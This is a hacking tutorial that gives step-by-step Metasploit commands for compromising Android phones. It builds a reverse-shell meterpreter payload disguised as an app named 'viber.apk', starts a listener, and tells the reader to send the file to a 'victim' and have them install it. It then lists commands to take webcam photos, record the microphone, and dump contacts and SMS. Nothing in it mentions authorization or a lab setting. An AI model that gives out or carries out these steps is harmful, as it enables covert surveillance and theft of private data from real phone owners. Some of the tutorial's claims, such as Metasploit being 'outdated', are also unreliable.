Hacking Android Smartphone with

Metasploit
Run Kali Linux and check your IP address

Open a terminal and type the following command.

msfvenom –platform android –p android/meterpreter/reverse_tcp

LHOST=<attacker_ip_address> LPORT=<4444> R > /root/viber.apk

(This will create an apk file in root folder which is our msfpayload script file.)

If you are using Backtrack you should use the following

msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<4444> R > viber.apk

Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker
machine, attacker needs to set up the handler to handle incoming connections to the port already
specified above. Type msfconsole to go to Metasploit console.

use exploit/multi/handler –> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the

payload is the same with step 2

set lhost 10.10.10.150 –> attacker IP address

set lport 4444 –> port to listen the reverse connection

exploit –> start to listen incoming connection

(Attacker already have the APK's file and now he will start distribute it, I don't need to describe
how to distribute this file, and internet is the good place for distribution)
When the victim lunches the apk file then attacker will get meterpreter shell connected to victim’s
Android smartphone.

Now run the following commands on meterpreter shell

sysinfo

webcam_list

webcam_snap 2

Metasploit for the Future Hackers

(msfvenom) : Hack Any Android Phone
msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and
Msfencode, putting both of these tools into a single Framework instance known as msfvenom
payload.

Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom
in kali linux. Metasploit is now a outdated tool.
STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.

Command:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110
LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the
LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :

Command:
root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone,
meterpreter session will be established.

7. Try the following exploit commands :

- record_mic
- webcam_snap
- webcam_stream
- dump_contacts
- dump_sms
- geolocate
8. use background command to run meterpreter in background. use sessions to check current
sessions. use sessions -i 1 to enter into a session.

REFERENCE VIDEO : https://www.youtube.com/watch?v=YRm-

St0bJhU&ab_channel=LoiLiangYang

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-
and-metasploit-framework-9e90af4a4d7b